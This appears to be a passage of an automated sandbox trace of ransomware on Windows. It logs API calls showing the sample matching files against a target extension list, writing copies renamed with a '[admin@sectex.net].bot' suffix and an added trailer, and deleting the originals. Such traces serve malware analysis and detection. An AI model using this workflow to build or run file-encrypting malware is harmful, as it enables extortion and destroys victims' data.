	[0144.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58
	[0144.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58
	[0144.031] lstrlenW (lpString=".doc") returned 4
	[0144.031] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.031] lstrlenW (lpString=".docx") returned 5
	[0144.031] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1
	[0144.031] lstrlenW (lpString=".pdf") returned 4
	[0144.031] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.031] lstrlenW (lpString=".xls") returned 4
	[0144.031] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.031] lstrlenW (lpString=".xlsx") returned 5
	[0144.032] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1
	[0144.032] lstrlenW (lpString=".ppt") returned 4
	[0144.032] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58
	[0144.032] lstrlenW (lpString=".zip") returned 4
	[0144.032] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.032] lstrlenW (lpString=".rar") returned 4
	[0144.032] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.032] lstrlenW (lpString=".bz2") returned 4
	[0144.032] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.032] lstrlenW (lpString=".7z") returned 3
	[0144.032] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58
	[0144.032] lstrlenW (lpString=".dbf") returned 4
	[0144.032] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58
	[0144.032] lstrlenW (lpString=".1cd") returned 4
	[0144.032] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58
	[0144.032] lstrlenW (lpString=".jpg") returned 4
	[0144.032] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58
	[0144.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58
	[0144.032] lstrlenW (lpString=".doc") returned 4
	[0144.032] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.032] lstrlenW (lpString=".docx") returned 5
	[0144.032] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1
	[0144.032] lstrlenW (lpString=".pdf") returned 4
	[0144.032] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.032] lstrlenW (lpString=".xls") returned 4
	[0144.032] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.032] lstrlenW (lpString=".xlsx") returned 5
	[0144.032] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1
	[0144.033] lstrlenW (lpString=".ppt") returned 4
	[0144.033] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58
	[0144.033] lstrlenW (lpString=".zip") returned 4
	[0144.033] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.033] lstrlenW (lpString=".rar") returned 4
	[0144.033] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.033] lstrlenW (lpString=".bz2") returned 4
	[0144.033] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.033] lstrlenW (lpString=".7z") returned 3
	[0144.033] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58
	[0144.033] lstrlenW (lpString=".dbf") returned 4
	[0144.033] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58
	[0144.033] lstrlenW (lpString=".1cd") returned 4
	[0144.033] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58
	[0144.033] lstrlenW (lpString=".jpg") returned 4
	[0144.033] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.033] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.033] lstrlenW (lpString="DD00372_.WMF") returned 12
	[0144.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0144.095] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=792) returned 1
	[0144.095] CloseHandle (hObject=0x3c0) returned 1
	[0144.096] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf")) returned 0x20
	[0144.096] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.104] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.104] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.104] GetLastError () returned 0x0
	[0144.104] ReadFile (in: hFile=0x39c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x318, lpOverlapped=0x0) returned 1
	[0144.106] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x320, lpOverlapped=0x0) returned 1
	[0144.107] ReadFile (in: hFile=0x39c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.107] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.107] SetEndOfFile (hFile=0x25c) returned 1
	[0144.107] CloseHandle (hObject=0x25c) returned 1
	[0144.107] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.107] SetEndOfFile (hFile=0x39c) returned 1
	[0144.110] CloseHandle (hObject=0x39c) returned 1
	[0144.110] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.110] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf")) returned 1
	[0144.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63
	[0144.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63
	[0144.113] lstrlenW (lpString=".doc") returned 4
	[0144.113] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.113] lstrlenW (lpString=".docx") returned 5
	[0144.113] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.113] lstrlenW (lpString=".pdf") returned 4
	[0144.113] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.113] lstrlenW (lpString=".xls") returned 4
	[0144.113] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.113] lstrlenW (lpString=".xlsx") returned 5
	[0144.113] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.113] lstrlenW (lpString=".ppt") returned 4
	[0144.113] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63
	[0144.113] lstrlenW (lpString=".zip") returned 4
	[0144.113] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.113] lstrlenW (lpString=".rar") returned 4
	[0144.113] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.113] lstrlenW (lpString=".bz2") returned 4
	[0144.113] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.113] lstrlenW (lpString=".7z") returned 3
	[0144.113] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63
	[0144.113] lstrlenW (lpString=".dbf") returned 4
	[0144.113] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63
	[0144.113] lstrlenW (lpString=".1cd") returned 4
	[0144.113] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63
	[0144.113] lstrlenW (lpString=".jpg") returned 4
	[0144.113] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63
	[0144.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63
	[0144.114] lstrlenW (lpString=".doc") returned 4
	[0144.114] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.114] lstrlenW (lpString=".docx") returned 5
	[0144.114] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.114] lstrlenW (lpString=".pdf") returned 4
	[0144.114] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.114] lstrlenW (lpString=".xls") returned 4
	[0144.114] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.114] lstrlenW (lpString=".xlsx") returned 5
	[0144.114] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.114] lstrlenW (lpString=".ppt") returned 4
	[0144.114] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63
	[0144.114] lstrlenW (lpString=".zip") returned 4
	[0144.114] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.114] lstrlenW (lpString=".rar") returned 4
	[0144.114] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.114] lstrlenW (lpString=".bz2") returned 4
	[0144.114] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.114] lstrlenW (lpString=".7z") returned 3
	[0144.114] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63
	[0144.114] lstrlenW (lpString=".dbf") returned 4
	[0144.114] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63
	[0144.114] lstrlenW (lpString=".1cd") returned 4
	[0144.114] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63
	[0144.114] lstrlenW (lpString=".jpg") returned 4
	[0144.114] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.115] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.115] lstrlenW (lpString="DD00414_.WMF") returned 12
	[0144.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.115] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=42908) returned 1
	[0144.115] CloseHandle (hObject=0x39c) returned 1
	[0144.115] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf")) returned 0x20
	[0144.115] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.116] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.116] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.116] GetLastError () returned 0x0
	[0144.116] ReadFile (in: hFile=0x39c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xa79c, lpOverlapped=0x0) returned 1
	[0144.119] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xa7a0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xa7a0, lpOverlapped=0x0) returned 1
	[0144.121] ReadFile (in: hFile=0x39c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.121] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.121] SetEndOfFile (hFile=0x25c) returned 1
	[0144.121] CloseHandle (hObject=0x25c) returned 1
	[0144.121] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.121] SetEndOfFile (hFile=0x39c) returned 1
	[0144.124] CloseHandle (hObject=0x39c) returned 1
	[0144.124] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.124] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf")) returned 1
	[0144.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63
	[0144.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63
	[0144.126] lstrlenW (lpString=".doc") returned 4
	[0144.126] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.126] lstrlenW (lpString=".docx") returned 5
	[0144.126] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.126] lstrlenW (lpString=".pdf") returned 4
	[0144.126] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.126] lstrlenW (lpString=".xls") returned 4
	[0144.126] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.126] lstrlenW (lpString=".xlsx") returned 5
	[0144.126] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.126] lstrlenW (lpString=".ppt") returned 4
	[0144.126] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63
	[0144.126] lstrlenW (lpString=".zip") returned 4
	[0144.126] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.126] lstrlenW (lpString=".rar") returned 4
	[0144.126] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.126] lstrlenW (lpString=".bz2") returned 4
	[0144.126] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.126] lstrlenW (lpString=".7z") returned 3
	[0144.126] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63
	[0144.126] lstrlenW (lpString=".dbf") returned 4
	[0144.126] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63
	[0144.127] lstrlenW (lpString=".1cd") returned 4
	[0144.127] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63
	[0144.127] lstrlenW (lpString=".jpg") returned 4
	[0144.127] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63
	[0144.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63
	[0144.127] lstrlenW (lpString=".doc") returned 4
	[0144.127] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.127] lstrlenW (lpString=".docx") returned 5
	[0144.127] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.127] lstrlenW (lpString=".pdf") returned 4
	[0144.127] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.127] lstrlenW (lpString=".xls") returned 4
	[0144.127] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.127] lstrlenW (lpString=".xlsx") returned 5
	[0144.127] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.127] lstrlenW (lpString=".ppt") returned 4
	[0144.127] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63
	[0144.127] lstrlenW (lpString=".zip") returned 4
	[0144.127] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.127] lstrlenW (lpString=".rar") returned 4
	[0144.127] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.127] lstrlenW (lpString=".bz2") returned 4
	[0144.127] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.127] lstrlenW (lpString=".7z") returned 3
	[0144.127] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63
	[0144.127] lstrlenW (lpString=".dbf") returned 4
	[0144.127] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63
	[0144.127] lstrlenW (lpString=".1cd") returned 4
	[0144.128] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63
	[0144.128] lstrlenW (lpString=".jpg") returned 4
	[0144.128] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.128] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.128] lstrlenW (lpString="DD00419_.WMF") returned 12
	[0144.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.128] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=712) returned 1
	[0144.128] CloseHandle (hObject=0x39c) returned 1
	[0144.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf")) returned 0x20
	[0144.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.129] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.129] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.129] GetLastError () returned 0x0
	[0144.129] ReadFile (in: hFile=0x39c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x2c8, lpOverlapped=0x0) returned 1
	[0144.130] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2d0, lpOverlapped=0x0) returned 1
	[0144.131] ReadFile (in: hFile=0x39c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.131] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.131] SetEndOfFile (hFile=0x25c) returned 1
	[0144.131] CloseHandle (hObject=0x25c) returned 1
	[0144.131] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.131] SetEndOfFile (hFile=0x39c) returned 1
	[0144.134] CloseHandle (hObject=0x39c) returned 1
	[0144.134] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.134] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf")) returned 1
	[0144.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63
	[0144.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63
	[0144.135] lstrlenW (lpString=".doc") returned 4
	[0144.135] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
